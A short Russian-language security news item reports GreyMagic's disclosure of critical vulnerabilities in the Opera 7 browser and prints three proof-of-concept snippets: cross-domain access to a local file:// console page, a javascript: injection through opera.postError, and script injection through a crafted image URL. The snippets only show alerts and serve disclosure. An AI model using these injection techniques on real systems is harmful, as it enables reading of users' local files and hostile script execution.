GreyMagic обнаружило несколько критических
уязвимостей в только что появившемся
броузере Opera 7.

  • Программа позволяет скриптам
    обращаться к данным других доменов, что
    позволяет атакующем читать локальные
    файлы:
    <script language="jscript">
    var
    oWin=open("file://localhost/console.html","","");
    oWin.setInterval=function ()
    {
    alert("Access to local resource achieved:
    "+oWin.document.location.href);
    }
    </script>
  • Недостаток в JavaScript консоли позволяет
    получать доступ к произвольным файлам на
    машине клиента:
    open("file://localhost/console.html","","");
    opera.postError("http://\"style=\"background-image:url(‘javascript:alert(location.href)’)\"");
  • Opera неправильно интерпретирует картинки,
    что так же позволяет получить полный
    доступ к компьютеру:
    open("file://localhost/images/file.gif?\">
    <script>alert(location.href);
    </script>","","");

Подробности на сайте http://security.greymagic.com/.



Оставить мнение